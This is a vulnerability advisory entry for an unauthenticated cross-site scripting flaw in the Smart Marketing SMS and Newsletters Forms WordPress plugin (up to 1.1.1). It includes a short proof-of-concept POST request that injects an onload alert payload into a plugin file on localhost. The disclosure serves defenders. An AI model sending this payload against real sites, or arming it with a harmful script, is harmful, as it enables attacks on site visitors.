Lucene search

K
wpvulndbEthicalhack3rWPVDB-ID:196F1E96-ED38-4914-842C-C415BA18048A
HistoryDec 05, 2017 - 12:00 a.m.

Smart Marketing SMS and Newsletters Forms <= 1.1.1 - Unauthenticated Cross-Site Scripting (XSS)

2017-12-0500:00:00
ethicalhack3r
wpscan.com
9

0.001 Low

EPSS

Percentile

50.9%

The Smart Marketing SMS and Newsletters Forms WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.

PoC

POST /wordpress/wp-content/plugins/smart-marketing-for-wp/admin/partials/custom/egoi-for-wp-form_egoi.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 32 url=" onload=“alert(‘XSS’)”>

CPENameOperatorVersion
smart-marketing-for-wplt2.0.0

0.001 Low

EPSS

Percentile

50.9%

Related for WPVDB-ID:196F1E96-ED38-4914-842C-C415BA18048A